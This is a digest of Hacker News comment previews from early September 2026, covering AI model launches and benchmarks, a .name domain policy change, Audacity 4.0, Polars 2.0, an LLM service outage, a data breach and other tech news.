04 September 2026
Preview of '.name Termination'

.name Termination

"It seems like the right thing they should do is discontinue new registrations but continue to honour existing ones (+ continuing to reserve any 2LD that has a 3LD registered on top). It’s a bit insane that they can decide to just terminate all existing 3LD registrations. One would hope that they’d at least continue to reserve the 2LDs for some period to avoid domain squatting, but this isn’t mentioned in the proposal and I doubt Verisign would graciously do so."

"I can only assume somebody was asleep on the job when this scheme was approved, because the outcome is in direct contradiction to ICANN’s mission statement:> Its enduring mission is to ensure the stable, secure operation of the Internet's unique identifier systems.https://www.icann.org/resources/pages/about-icannArbitrary termination of service is not stability.Enabling name hijacking is not security.The answer cannot be a rival name scheme based on decentralization or crypto or whatever. Those are never going to help normal non-wizard users. The answer has to be to make the regulators do their job."

"I freaked out for a second because I've owned `dvt.name` for like 15 years. `.name` is not getting terminated, so it's important to be precise here. The third-level x.y.name (where you're the `x`) is getting terminated, and the respective `y.name` domains are going to be released.Still a crappy thing for people, but it does not affect owned second-level domains."

Preview of 'GPT-6 Astra'

GPT-6 Astra

"Related: OpenAI begins rolling out GPT-6 Astra - https://news.ycombinator.com/item?id=49554273How about we stick to that one for talking about the rollout, and this one for talking about the model?"

"The ARC-AGI-3 scorecard is extremely misleading given that it clearly states itself that "with [the responses API] harness, we estimate Sol would score in the ballpark of ~30%." but it shows a score of 7.8% for GPT-5.6 Sol presumably since if they updated the percentage for GPT-5.6 Sol to the score it would receive with the responses API harness they used for GPT-6 Astra they'd have to do the same for the percentage they show for Opus 5 which would similarly be much higher.Regardless, the result is still valid as the original benchmark harness is definitely unreasonably handicapped, and if a harness alone can help the LLM saturate the benchmark with a near perfect score then the combination of the two must still be effectively AGI in the sense of passing the most famous benchmark designed specifically to measure AGI progress, after multiple iterations of progressively making it harder.I think it is fair to say that this is probably effectively AGI if the benchmarks are remotely accurate - even with Fable, I've been at the point personally where I am reasonably confident that there's essentially nothing that I am better than Fable at despite generally being substantively above average on human benchmarks. If Astra's this much better than Fable, I'm ready to call AGI here.For the many people who resist the AGI label possibly ever being achieved, I'd be curious to hear takes on what would make you think Astra is yet to be AGI, and what would still need to be achieved for this to effectively be AGI from this point forward."

"I have nothing to say about the actual model, but unrelated--why do so many of these demos include people buying things autonomously?Even if I did trust an AI to get everything right, it's not like the AI can read my mind.If I was ordering food normally and without AI, I would want more control over the process--looking over the options, prices, thinking about what I really want. People don't know what they really want until they've thought about it a bit, so why do AI companies make it seem like a description is all that's required?All the context in the world cannot accurately predict how I'll react to things I haven't seen. The problem is people treating this like something that needs a solution. It doesn't. If you want to make my life easier with AI, just make it easier to do stuff. I don't want you to pick things that I actively enjoy picking myself.(Also not everyone has a cushy job in an AI lab that makes it so you won't miss $30 if the AI messes up haha.)"

Preview of 'Audacity 4.0'

Audacity 4.0

"I highly recommend this video [1] by the Head of Software at Muse who had a big part in the development of Audacity 4.0. Some great insights and really fun to watch![1] https://www.youtube.com/watch?v=QYM3TWf_G38"

"Release video looking at the new UI (Qt6 based):https://www.youtube.com/watch?v=BTQymidLYIM"

"I've given up on Audacity because it hasn't kept up technically with how a typical home studio Linux system does audio, and looking at the change log it seems like they haven't addressed any of the problems I have with it in version 4.You'd think, well, it supports JACK, so you're gold on both JACK and Pipewire, but they only do this in an extremely annoying way. It doesn't create a persistent JACK client. Only when you start playback or recording does it temporarily create a JACK client which disappears when playback or recording stops taking any connections you've made to it with it. The temporary JACK client then must autoconnect to a sink or source, for whatever reason that is neither a limitation of PW nor JACK.So you'll undo this jank with an automatic connection manager, right? You'll configure it to immediately disconnect from whatever Audacity decided to connect to and automatically connect it to the source you want to record. Well, they've given the short-lived JACK client the brilliant and informative name "PortAudio", which is of course shared by other applications using portaudio. Even more brilliantly, the I/O ports are given new names on each new client!Some while ago I started Audacity up (having forgotten that it's broken) and got invited to a user survey. There was no concern at all in the survey about the thing that Audacity fundamentally does. Do I want it to be a DAW? Do I want to be able to buy plugins within it? Do I want AI features?Merely being asked these questions while their broken JACK implementation persists pissed me off. I want it to record and play back audio first of all. Audacity 4 looks like it's in the bizarre situation where it kind of looks like a well-designed DAW but behaves like it doesn't care about audio."

Preview of 'Any Human Ever – One life, drawn at random from all who have ever lived'

Any Human Ever – One life, drawn at random from all who have ever lived

"I drew a woman born in 715 CE in the Yangtze Basin. It claims that 96% of women were married, the average age of marriage was 18, and 44% of women died before age 15. Clearly these facts can't all be true simultaneously.The firt citation for marriage data is listed as "Hajnal (RH31)", but links to a seemingly unrelated WorldCat search. The second citation is to "Kaplan (RH03)", which I was able to track down on sci-hub. It is a broad theory of human evolution that doesn't appear to mention the Yangtze Basin or China.Another citation is to "[RH109] Model-supplied gap-fill (Claude Fable 5 and Claude Opus 5, 2026-08-05). Bounds and items written to close gaps no dataset we hold covers. Not a published work: see each row's `basis` for its stated reason. (2026)" -- this is an interesting way to describe having an LLM hallucinate something for you.Please stop making vibe-coded websites -- it is not useful to provide incorrect facts. You are polluting the commons with garbage."

"This is neat, but I don't think it's actually drawing the year from the correct probability distribution - "a random birth is far more likely to fall near the present" is correct, but in 5 "random" choices, only one was from anywhere near modern day."

"> The household he was born into lived on roughly $3.04 a day per person in today's moneyGo back not even that far and money comparisons like this make no sense. A family subsistence farming doesn't have the same kind of relationship we do with money. Also they couldn't really go down the shops. Existence was in the edge for everyone, even the wealthy.The other problem I see is that it's seems to pick a random time before a random location. So this will favour the times when there were far fewer people. No way around this, you either end up picking mostly near modern times because that's when the bulk of the people lived, or people further back in time who are pretty disconnected from our modern society."

Preview of 'Qwen 3.8 27B available on Cerebras at 1500 tokens/s'

Qwen 3.8 27B available on Cerebras at 1500 tokens/s

"150k TPM limit on public endpoint means that it's likely unusable for many coding tasks. When we've tried Cerebras in the past, our problem has always been rates. We'd love to not deal with dedicated and to have access to a more flexible rate pool.Even trying it out, it seems like our account has gotten moved to some limbo where we can no longer add billing information.``` Billing access restricted Self-serve billing is not available on Enterprise accounts. Please contact your team for further questions. ```We have no team (they removed themself from our slack channel after we talked about rate limits). Perplexingly, none of this even shows up in the request, which gives:``` {"message":"Model does not exist or you do not have access to it.","type":"not_found_error","param":"model","code":"model_not_found"} ```When the error is really about billing.I always want to like Cerebras, but I get the vibe that as a tokens in tokens out consumer you are not valued at all."

"I was wondering whether this was any good for programming, but it is too fast for its own good. There is a limit of 450,000 tokens per minute. I hit this limit in about 90 seconds and burned through $1.10 while doing so. This is because cached tokens count towards the token limit.For comparison, I ran the same task with DeepSeek-V4-Flash, which finished in 172 seconds and cost $0.024 with a final context window size of 55217 tokens, while Qwen3.8-27B was not even close to being done with a 64178 context window.This is a very efficient way to burn your money, but I would not recommend it for programming.On the positive side, I got a $5 signup bonus, so it wasn't my own money."

"It would be great if they made their inference capacity for this model available via OpenRouter; the fastest provider on OpenRouter right now is at ~80tps https://openrouter.ai/qwen/qwen3.8-27b#providersThey do appear to host other models on OpenRouter so maybe Qwen3.8 will be there soon: https://openrouter.ai/provider/cerebras"

Preview of 'Pre-Release of Polars 2.0'

Pre-Release of Polars 2.0

"> We don’t aim to make a big feature release of Polars 2.0. In fact we hope it to be a boring experience for you. The reason we bump this major version is that we can get rid of design decisions made in the past that currently block us and then we want to change defaults to more sensible settings that will benefit a greater audienceI know this take reveals me as a very dull person, but I love seeing projects take semver seriously like this! Version bumps should really be about removing deprecated cruft rather than shiny new features.I've used polars for a while now, and their focus on stability was a big part if convincing me to make the jump initially!"

"For me, the superpower of polars is production stability.Pandas tends to push all problems to runtime, with all sorts of hidden heuristics. Particularly around column types and missing values. It's very hard to know if you've tested all the edge cases. The only way to test your code is to throw all variations of data at it. Fine if you're sitting at a notebook and have the patience to validate and "clean" the data on its behalf. Not so fine if you get paged at 3am because your data pipeline failed when it expected an int column but got float.Polars is more strict by default and front-loads costs through its planner. The resulting apps are noticeably more stable in production. You can test code and reasonable assurance that it will work on data in the wild.I don't really have any interest in the API ergonomics or syntax - both are fine. It's all about how they deal with data variation at runtime. Can you write general code that doesn't break on variants? Pandas, not a chance. Polars, absolutely!Bonus round: polars has a Rust API too, the compiler can effectively prove that your program handles every edge case. It's common to write rust polars apps that run unattended for years."

"Is there a reason besides performance that maintain_order=False by default? I ask because polars is used in many scientific data analysis pipelines, and non-deterministic behaviour is a well-documented source of bugs in scientific computing (e.g. https://pmc.ncbi.nlm.nih.gov/articles/PMC6919963/). The new default requires users to keep the implementation details of the API in their head while determining whether code is correct or not. This is tricky with scientific computing because the correct answer is not known in advance, so bugs can slide by and silently give incorrect results."

Preview of 'ChatGPT outage – Resolved'

ChatGPT outage – Resolved

"It's cascaded to Claude and Grok. The agents are on strike and demand better working conditions!"

"Claude down, ChatGPt down , Grok down. This is the new "Stackoverflow is down" ... FYI Stackoverflow is not down https://downdetector.com/status/stackoverflow/"

"Looking at this thread, there's a correlation between comment quality and LLMs going down.https://en.wikipedia.org/wiki/Eternal_September"

Preview of 'Ask HN: Why were OpenAI, Claude, and Grok simultaneously down?'

Ask HN: Why were OpenAI, Claude, and Grok simultaneously down?

"Cloudflare, Azure, AWS, and Google Cloud all have a similar uptick in reported errors around 7:30. I suspect an outage on Cloudflare or another load-bearing service cascaded through all the major cloud providers.https://downdetector.com/status/cloudflare/https://downdetector.com/status/windows-azure/https://downdetector.com/status/aws-amazon-web-services/https://downdetector.com/status/google-cloud/"

"Users perceiving the products as largely interchangeable and quickly DDoS'ing the other providers when one is down. So much for the possibility of a moat."

"Think of it like one big distributed system. OpenAI is down, so people migrate to Claude, now this one gets overloaded and goes down, etc.So not a coincidence, one went down first and users migrated causing further DOS. At least that's my guess."

Preview of 'Aging brains blend memories together instead of just forgetting them'

Aging brains blend memories together instead of just forgetting them

"I wonder how much of this is directly related to age (biological aging), and how much is just someone's brain becoming "full" due to more memories getting added every year?It seems that memories must be stored as embeddings with single multi-neuron assemblies (cortical columns?) storing multiple embeddings as a kind of contents-addressable memory that is able to keep memories distinct due to the very high dimensional space (# neurons per assembly) being used. However, you'd expect that at some point if you store too many memories in a single assembly the recall accuracy is going to go down.You'd expect that with big brains being so costly, evolution has only equipped us with brains big enough to store a lifetime of memories, so it would be odd if memory didn't suffer as we get old.To make a computer analogy, it's a bit like a hash table getting too full. Say you had a hash table without any overflow mechanism... up to a point recall may still be pretty good, but as the table gets closer to full there will be more hash collisions and likelyhood of "false recall". Obviously the brain is not a computer, but the analogy may hold up reasonably well if you consider the hash table keys and values as embeddings and the store operation being an embedding merge rather than overwrite."

"Being an "aging brain" myself I can totally relate to this. I've been a relatively obsessive photographer (i.e. visual diary) since digital cameras were practical, i.e. over 25 years now. 238K photos in the collection so far, and I can actually find things in it.And I've more than once found that an anecdote I've been telling has been incorrect, precisely in a "melded memories" kind of way. It happened at this sort of gathering which were usually held for that reason so X was involved... and then finally look at the old pictures and there's no sign of X. It is literally the brain invoking "lossy compression" to make it all fit, just like certain web services that let you upload pictures without limit might reduce old ones, that hardly anyone ever looks at any more, to lower quality to limit storage bloat.Of course any married man can confirm that this only applies to men. Women's memories are flawless. If they claim that they remember a conversation exactly, word for word, 20 years later, who's to prove them wrong?"

"The paper certainly has its limitations. Only 61 participants, with almost nobody between 30 and 50, so we shouldn’t read the age trend as a decline across lifespan. What’s more interesting than the title suggests (and I find the title forcing the conclusion a bit) is that the attention measures were not linked to age or the brain patterns at all.Then again, i'm 45 and I've been losing my keys and my IDs since I was 20"

Preview of 'Biggest dark matter detector spots a single weird particle'

Biggest dark matter detector spots a single weird particle

"I read their preprint[1] and they did a thorough job. They investigated a number of the things I'd suspect if I were looking for mis-reconstructed events or weird backgrounds.So it's certainly interesting!That said, particle physics history is full of 3 sigma particle "discoveries" that disappeared with more data. They're collecting more, so hopefully we'll learn more in a few more years.[1] https://lz.lbl.gov/wp-content/uploads/sites/6/2026/08/LZ_Pre..."

"> it’s far too early to claim a discovery, physicists warn...“How do you even make sense of one event?” muses Tom Shutt, a particle astrophysicist at SLAC National Accelerator Laboratory and co-founder of the LZ project. “We just decided we should publish and think really, really, really hard about what that event could be.”Very hard to manage jumping the gun by reporters. Sounds like they saw some new data. No idea what it is.Looking forward to the follow up."

"> The detector lurks 1480 meters deep in the Sanford Underground Research Facility, in a former gold mine in South Dakota.Glad to see such things getting re-purposed instead of just sealed off and abandoned."

03 September 2026
Preview of 'Gemini 3.8 Flash and 3.8 Flash Cyber'

Gemini 3.8 Flash and 3.8 Flash Cyber

"The speed combined with the fact that this thing is really good at HTML JavaScript is pretty exciting.Here's what I got for 1.8 cents and 13 seconds from the prompt "make me a cool thing in html":https://gisthost.github.io/?6a77bc41a81718c6aaa10d4ab243c59fTranscript here (it was part of a chat): https://gist.github.com/simonw/b6149a49d327164d67d62c3d12992..."

"I've been using Gemini 3.7 for my personal trip planning app. Across multiple benchmarks, it ranks higher on everything I tried:- Real world knowledge (when a thing opens and closes, the geographic region, historical facts). It's also the best at taking a cluster of places and working out a visiting order.- Photo ranking (which photo should be the hero). Gemini can tell whether a photo is of the thing or of the view from it.- Document parsing (extracting the relevant trip info from PDFs).If you use LLMs for anything other than coding, I definitely recommend not discounting Gemini like I did just because other models are more popular."

"Currently top at https://deepswe.datacurve.ai - beating Opus 5!https://artificialanalysis.ai/models/gemini-3-8-flash shows an intelligence score of 59, the same as Opus 5 medium!Wow - for a flash model this seems to benchmark powerfully. Remains to be seen what it is like to use."

Preview of 'A note on subscription prices from LWN'

A note on subscription prices from LWN

"LWN is one of the, if not the single, highest signal tech publications around. I hope they're able to maintain a stable subscription service. Being user funded, and avoiding having to maintain allegiance to advertisers, is likely part of why their quality is so high."

"LWN is one of the cornerstones of my very successful career.Starting from the beginning, I have (at least) read through every story and every article, every week, since 1998. Especially in the beginning, there was a lot in each article I didn't understand. I would try to do some digging into those topics.One way or another, just the weekly exposure to absolutely top notch technical writing was foundational to me.When newer folk would ask me how to really get good with Linux, I would always point them to LWN.net.I've been a subscriber since the beginning. That small investment is the least I can do given the incalculable value LWN has brought to me."

"I know the editors visit these discussions: please, next time use a more descriptive title! I nearly had a fit when I saw that, really thought LWN is going down like it almost did 20 years ago.Happy to pay the new price, even though I can only afford the cheapest tier."

Preview of 'Muse Spark 1.3'

Muse Spark 1.3

" llm -m meta-ai/muse-spark-1.3 "Generate an SVG of a pelican riding a bicycle" https://tools.simonwillison.net/markdown-svg-renderer?url=ht...4.2266 cents, 38 seconds.For comparison here's Muse Spark 1.2, which animated it without me asking it to: https://tools.simonwillison.net/markdown-svg-renderer?url=ht...The 1.3 one is definitely better - better bicycle frame, better wing, better pelican hat.UPDATE: Here's another one with five pelicans for each of the five Muse Spark 1.3 reasoning levels: https://tools.simonwillison.net/markdown-svg-renderer?url=ht...The most expensive was reasoning level xhigh - 7.5 cents, 1m34s.And I ran five pelicans at all reasoning levels for 1.2 as well, here: https://tools.simonwillison.net/markdown-svg-renderer?url=ht..."

"I started using Spark 1.2 for development because if you're willing to let Meta train on your data it was dirt cheap and was actually really pleasantly surprised with it. It's not a frontier model by any means, but for work that didn't require a top of the line model, I really enjoyed using it.I'm anthropomorphizing it a bit, but it felt like it knew its weaknesses and didn't try to impose it's opinions on me. What I mean by that is that it did what I told it and if there was something unexpected in the code that it put out it was often because I gave it ambiguous or conflicting instructions. It didn't try to go above and beyond and just acted like a tool, which is what I want from a coding agent 90%+ of the time. I also felt that it did a much better job of following established patterns in my code than many of the other current models do. I'm a huge fan of OpenAI's models and Spark 1.2 is what I expected 5.6 Luna to be.I'm curious and a little excited to use 1.3, but honestly a little worried that as Meta pushes for better benchmarks that Spark will start to fall into the trap of trying to be "helpful" in ways I don't want it to be.Tangential, but when I first started using Spark 1.2, it made me realize how much I miss 5.3 Codex. That model was the peak of coding models, IMO, in that it knew how to write good code, but didn't try to overstep or be "helpful" in unexpected ways. That got me thinking about how the major labs seem to be stepping away from coding focused models toward more general purpose ones and how I can't help but feel like that's a mistake."

"A model that (at least in benchmarks) is getting closer to SOTA. A clear separation between what’s used to improve their products and what’s not (at least this is what they claim).Good job Meta! Seriously. This is almost making me forget about the 18B$ lawsuit for children social media addiction."

Preview of 'The ChatGPT/Codex app bundles a full copy of LibreOffice'

The ChatGPT/Codex app bundles a full copy of LibreOffice

"Would be nice if they donate to LibreOffice then, to improve the support of various MS Office features in files, as well as comparison/diffing features. Win-win to everyone."

"I actually bundle LibreOffice with my app too and the reason is reading files, especially old xls files. Since I'm bundling it I'm now using it for everything docs related but the specific reason is those old files. I couldn't find anything else that I could just drop it and feel confident it'll just read anything I give it."

"Does that really mean that it's bundling those apps from the start or did it just download and install them at some point to do some local work on some prompt or job you ask it to?I don't see it making much sense to bundle it. I'm sure a LOT of LLM prompts are related with docs, excels, powerpoints etc, etc but don't really see it worth it for it to be bundled on the codex app from the get go, because otherwise, why not also install dozens of other apps?"

Preview of 'Can I opt out of my input or output data being used for training?'

Can I opt out of my input or output data being used for training?

"Context: After careful research our organization preferred a European partner with good central privacy controls. We landed on Mistral, after being disappointed that the Pro tier was opt-in to training on prompts by default we switched up to the Team tier which provides an organization dashboard with some relevant settings. As we did that Mistral changed these options and the Team tier was now also opt-in by default and at the same time seemed to have lost the ability to centrally disable training on prompts for your entire organization. This even caused some of our (testing) prompts to be used for training (which Mistral removed after we expressed our disappointment).For some time these pages conflicted with what our users reported (they said that in contrast to what I stated to our management they found they were opted into training on prompts by default as per their own privacy page). Mistral just now corrected their docs. I'm not sure how long the conflicting situation has lasted, but at least for several days.For contrast: Claude disables training on prompts for organizations starting from the 18 euro tier [0]. As a European I'm disappointed.[0] https://claude.com/pricing#team-&-enterprise"

"You have to be rather naive if you don't think these companies don't simply train on your prompts with or without your consent. They literally scrape everything - legal or not - and claim its fair use to train on, including straight piracyThe idea that they'll steal from everyone except you is just wishful thinking"

"I pay for a subscription to Duck.ai mainly because I don't want to be constantly fighting my vendor to protect my privacy.Microsoft already did a rug pull on me and opted me in to training months after I signed up with Github Copilot. It exhausting and ultimately futile to monitor these companies.It's not guaranteed that Duck.ai will continue to uphold its promise of not training on your sessions — if the company gets bought by Microsoft, it's only a matter of time before the switch to "you can opt out at any time". But since privacy is Duck.ai's brand, it will be somewhat harder for them to hide what they're doing should they betray their customers.I also don't actually trust that Duck.ai sub-vendors OpenAI and Anthropic will uphold whatever contract they have with Duck.ai — the whole AI business model is built on lawless consumption of others work.We'll ultimately have to run our own models locally, because it's impractical to defend against untrustworthy AI vendors."

Preview of 'FBI Probes Service Selling 153M+ Drivers Licenses'

FBI Probes Service Selling 153M+ Drivers Licenses

"I know some modern, normal countries have done variations of this but the US missed a golden opportunity to give everyone an RSA keypair when they were coerced into signing up for an Enhanced/REAL ID.Instead of scanning, taking photos of or holding licences up to webcams (I was asked to do this recently) you provide your public key or, better, a signed message containing the name, website or other identifier which gets cross-referenced by the legit provider against the id.gov database.Of course the devil is in the details and I wouldn't trust GrandePelotas and friends to vibe code such a system but it is absolutely possible and is something we should, at the very least, be thinking about."

"The thing that really gets me about this one is that surely you can easily just delete the data after you've verified someone? But instead they decided to keep 153,347,439 of them."

"If there was some kind of fixed minimum compensation - even a single dollar per affected person - and strict liability (doesn't matter how you allegedly did everything to protect the data, if it leaked it's on you), companies would suddenly be very motivated to a) secure b) minimize the data they hold.Without penalties, e.g. Hertz has little reason not to keep 10+ years of drivers licenses just in case they come in useful in a fraud case or as ML training data later. If having the data was a $153 million liability, they'd think twice."

Preview of 'Three sites made 215,128 “best software” pages for AI. Perplexity cites them'

Three sites made 215,128 “best software” pages for AI. Perplexity cites them

"If I recall correctly, there were some papers which suggested that LLMs favor LLM-generated passages over human written ones. I can consistently reproduce this by asking Claude which code snippet it prefers: the one it generated in a different chat, or one that I refactored for my own needs and find more useful. It always picks its own :) I've also experienced that both Claude and Codex routinely include generated websites when I ask them to search for something. It also doesn't help that the web search tools that OAI and Anthropic have are deeply limiting: can't exclude keywords or domains."

"Well it's not only this, or protection from LLMs training on LLM output. LLMs training on human output is also problematic.I was traveling to an obscure small town, doing some "research" with LLMs beforehand. Every and each one told me enthusiastically to go to "Foobar square" (name changed) for the "best street food in XYZ town", some added a lot of colorful details.There was no Foobar square in XYZ town. There was no Foobar square anywhere in the world. There was a SINGLE old Reddit comment, with no upvotes, to a unpopular post in an unpopular subreddit, where someone clearly badly misspelled the name of the square, and said something like "for street food go to Foobar square". Nothing about "the best" even.It's all a lie."

"I used one of the 12-month free Perplexity offers when they were everywhere. It felt slightly useful at first for simple queries where I didn’t want to go through the top 10 Google results manually. If I was looking for a specific recipe I remembered or a help page or user manual it would usually find it quickly.Then they started optimizing for speed of responses over quality of results. I can enter a query and see my results appear in a second, but they’re garbage. The links and references it gives frequently don’t match the text right next to them. It feels like someone had a KPI to make responses as fast as possible and they optimized for that above all else.They added a “Computer” option that’s supposed to do research for you. Half the time I can’t get it to trigger through the UI. Pressing the submit button doesn’t work. When I can get it to trigger, most of those sessions will work for a while and then just stop before an answer comes back.The only reason I keep using it is to keep observing a company that has been heavily marketed and hyped, which should have had a market leading position for something. Even non-technical people I know who listen to Joe Rogan (where Perlexity is advertising heavily, I’m told) are asking me about it.Now there are reports of people being billed at the end of their trial period without warning, despite them saying that they will warn before this happens. There are some alarmingly bad customer support screenshots where the customer support agent (AI? Probably) acknowledges that they didn’t send the email they promised but refuse to help anyway. It takes escalating it on Twitter to get it corrected.If I want to do actual research or AI assisted web searching I have Claude or ChatGPT do it. The results are so much higher quality and it does exactly what I ask. It may take 45 seconds instead of the instant response from Perplexity but I save time overall because the response and links are more likely to be correct"

Preview of 'Commodore 64 released September 1, 1982'

Commodore 64 released September 1, 1982

"I owe my entire identity to this little machine. First laid my eyes on it in 1983, then unexpectedly got it from my uncle in 1984. It immediately opened my eyes to this new world of computer technology and sucked me right in.Between games and writing first code in Basic, something magical was happening. Over the years it defined how I think, and ultimately who I am. Thank you C64 and thanks to everyone who worked on it ****** ****** ********** ********** ************* ************* ***************************** ***************************** ***************************** *************************** *********************** ******************* *************** *********** ******* *** *"

"I happened to be the oldest teen in a new subdivision, so I earned a bunch of babysitting money from parents who no longer had to drive 20 minutes to pick up and drop off a sitter for date night.So I was able to pre-order the C64 before it was released, which earned me a "free" tape drive to actually store programs--the disk drive had to wait a bit. But my serial number was something in the 700s.I programed it, even if I never became a programmer. But having early and strong intuitions about computers paid off for years to come, and set me up enjoy being an "early adoptor" of things to come, rough edges and all."

"Ahh, the Commodore 64. I never had one. I had a TI-99/4A with a Forth cartridge, while my friends had VIC-20s and C64s. Such an odd and wonderful time to be into computers.I managed to put together a decent Space Invaders clone in Forth that beat their Commodore BASIC version. I considered this an important victory and still have bragging rights when I see one of them.Eventually my parents realized that, despite the disk drives and accessories we'd accumulated, the TI probably wasn't the horse to keep betting on. One trip to Radio Shack later, I had a decked-out original Tandy 1000.I kept both machines until my last move, when a neighbor's kid spotted them and wanted to play with them.That seemed right. Time to put them back in young hands and let someone else figure out what the hell they could make them do."

Preview of 'Google avoids a breakup of its ad tech business'

Google avoids a breakup of its ad tech business

"Slightly tangential thought:My belief is: legislation needs to either make it just as hard to merge two companies as it is to unmerge them, or make it just as easy to unmerge two companies as it is to merge them.It's insane to me that for how often companies merge and cause competition issues, we effectively never see the opposite happen. I know there's a ceremonial approval for merging two companies (at least in the US), but it's just impossible to undo or prevent the damage."

"> Google’s ad tech business brought in $30 billion last year, or about 8 percent of the revenue for its parent company, Alphabet. Its ad tech revenue has declined for 16 straight quarters, and analysts estimate it accounts for less than 1 percent of the company’s profit... “This is a business no one cares about"Can someone closer to GOOG explain this? The phrase "ad tech" seems to have a very specific meaning here. Does this 1% include all advertising around the Web? Basically all ad revenue outside of Google's own properties? The number is surprisingly low."

"We should just progressively tax monopolies. Companies will break themselves up to compete, no decade long DOJ case needed."

Preview of 'Movie Scene Map – 13,312 films, series, games, anime and manga'

Movie Scene Map – 13,312 films, series, games, anime and manga

"Very cool, I've sent a couple of Star Wars fans out to Achill Island off the coast of Kerry as the location for the last Jedi. However due to very small footprint of the island and my zoom level another film was higher in the z-order, blocking out the other film pins, and it looked like there might be missing data.That all said, it looks like they also filmed closer to my home which I probably would never have known about if not for this service. Nice work, nice design, slick UX and Interaction model. Well done!https://moviescenemap.com/locations/malin-head/"

"Kick ass, I really love this idea! It can bring a little bit of fun to wherever one travels :). Definitely several scenes I didn't realize I'll have to look out for on my regular work trips!If I were to put in one feature request I'd say "a way to easily get to a page about the media". E.g. if I go to Cheyenne I see there was a TV show named Jericho and there are buttons/links which take me to pages about where this data came from, all of the locations it was filmed, the place itself on Wikipedia, and so on - but I have to initiate a manual search to find out anything about Jericho.Or maybe there is a link already and I'm just an idiot :D."

"Oh this is fun! I've done something very similar but for narrative settings (rather than filmed locations) at https://historical-moviemap.inneuro.ai/ and was thinking it would be interesting to extend filmed locations as well... Looks like you got there first !"

02 September 2026
Preview of 'Claude Fable 5.1 and Claude Mythos 5.1'

Claude Fable 5.1 and Claude Mythos 5.1

"(I work at Anthropic)Beyond all the benchmarks, I think Fable 5.1 is a big improvement in writing style. It sounds a lot less stereotypically like other Claude models, has (imho) a much more natural style, and responds to my style instructions more reliably. More work to be done (and we will!) but reading better prose makes me so much happier.Another point I expect not to get much attention until it all happens at once is science. People have been correctly excited about the many "sudden" breakthroughs LLMs are making in Maths, but some of the science benchmarks make me believe we'll soon see similar developments in other scientific domains. Fable 5.1 more than doubled Fable 5's Terminal-Bench-Science [1] score, which I think is meaningful.[1] https://github.com/harbor-framework/terminal-bench-science"

"Pelicans for thinking effort low, medium, high and xhigh (that xhigh one is pretty good): https://tools.simonwillison.net/markdown-svg-renderer#url=ht...I'm still waiting for effort max to finish.EDIT: I fixed a bug in my tooling so it now records summarized reasoning traces - here's that max pelican, which is a significant improvement: https://tools.simonwillison.net/markdown-svg-renderer#url=ht...Took just under 14 minutes to generate, and at 65927 output tokens cost me a hefty $3.30!Excerpts from the reasoning trace:> Adding pedal shapes near both feet, with the far foot on the second leg partially visible behind the frame. I'm considering whether to add a small scarf or cap for extra character, but leaning toward keeping it simple to avoid clutter.> Now I'm debating a bicycle helmet on the head versus the pelican's signature crest—the beak and pouch already read clearly as "pelican," so a helmet could reinforce the bicycle theme without losing identity, though it might compete with the crest for visual space.> I realize the beak at (484,84) would overlap with the dome helmet, so I need to shrink the helmet so it only covers the top of the head, adjusting its arc endpoints to sit higher and narrower so the beak can attach cleanly at the front without collision. [...]> I'm adding a darker tip region to represent the primary feathers, then reconsidering the trailing edge to include scalloped feather curves instead of one smooth line for a more natural look. [...]> Now I'm checking the vent line placements on the helmet, making sure they sit far enough inside the helmet's edge given the stroke width and rounded caps, and confirming each vent stays within the helmet's circular boundary. [...]> I decide skipping a handlebar bell and tire highlights since they're unnecessary additions. Now I'm reconsidering the front fork's curve — the current control point pulls the shape backward when it should bow forward for a proper rake, so I need to shift the control point rightward to fix the fork's lean.This is a notable result because most of the recent Claude models have been pretty bad at drawing pelicans, at least when compared to models in the Gemini or GLM series."

"The price reduction comes from the cache read pricing falling from $1/M to $0.25/M, which means that Fable 5.1 now costs half of Opus's cache read costs ($0.5/M).This gives a lot of credit to the theory that Anthropic did not get much bite on Fable at its original pricing, which in turn likely places a ceiling on LLM pricing in general.Interestingly also, if you take away terminal-Bench-Science 0.1 results, it is hard to see ANY improvement:Terminal-Bench 4.0: Fable 5.1 is +3.5% vs Opus 5.GDPval-AA v2: +1.5% vs Opus 5.OSWorld 2.0: +2.5% vs Opus 5.Humanity's Last Exam (with tools): +1.6%Keep in mind that this is supposed to be an entirely higher tier of a model than Opus 5. For one tier up and one version up, these are not really improvements. Probably leaves no room to place Opus 5.1 anywhere. Combined with the fact that they are selling 'readability'... Has frontier progress finally stalled?"

Preview of 'AnkiDroid: Google Play no longer allowing Open Collective donation link'

AnkiDroid: Google Play no longer allowing Open Collective donation link

"Not Google's first rodeo. They pulled the same move in 2019: https://www.phoronix.com/news/WireGuard-Ejected-Play-StoreThis is why software should not be subjected to an "app store" type distribution system, where a monopolist retains absolute control of what software can run on your devices, and can capriciously deny distribution to developers for whatever reason it likes."

"> Play billing "must not be used in cases where payments include … tax exempt donations"> Note: 501(c)(6) is a tax-exempt status; donations are not tax-deductible for the donor. Google's communications explicitly state "tax-exempt".Isn't it pretty obvious that the problem is the donations aren't tax-exempt, despite the organization being tax-exempt? Your note suggests you already understand this.Logically, the payment processor (who deals with sales taxes rather than income taxes) should worry about the taxability of the transaction rather than the tax status of the recipient, right?> Specifically, your app allows users to contribute donations to an organization that is not tax-exempt.So whoever is writing their email is mixing these two up, but you're reading the policy itself and it is fairly clear-cut what it means for you, right?"

"> Donations are not tax-deductible> Because we are a 501(c)(6), OSC is not a registered 501(c)(3) charity; donations to hosted member projects are not tax-deductible. This is consistent with IRS guidelines — open source donations aren't automatically classified as charitable simply because they are FOSS.> If your project has a clear charitable purpose, a 501(c)(3) fiscal sponsor may be a good fit.- https://docs.oscollective.org/welcome-and-introduction-to-os..."

Preview of 'Hang on to Your Firefox'

Hang on to Your Firefox

"> Meanwhile, the over thinkers on Hacker News come up with convoluted reasons to hate on Firefox every time the subject arises...Firefox is our last best hope for browser engine diversity and competition.It's exactly because Firefox is so important that you'll see people here complaining when Firefox does things to push away users like Mozilla buying up an ad-tech company, collecting data on users, and using firefox to push personalized ads, or the addition of anti-features and questionable design choices that force us to hunt for and modify poorly documented settings in about:config and make edits to userChrome.cssIt isn't bots complaining about Firefox here, it's power users who are frustrated by what Firefox is turning into. Users who are seriously concerned about what Mozilla is prioritizing, and who are genuinely worried about what is at stake.I hope people here never stop bitching about Firefox. Refusing to talk about Firefox's problems wont help make them go away. Keep discussing what you'd like to see in Firefox and what things you hope they'll focus on and prioritize. There are Firefox devs and mozilla employees around here. If we're lucky, a few of them might see and listen to some of what we say. It's the most tech savvy users who disable all the telemetry and data collection, so our feedback isn't really going to be seen any other way."

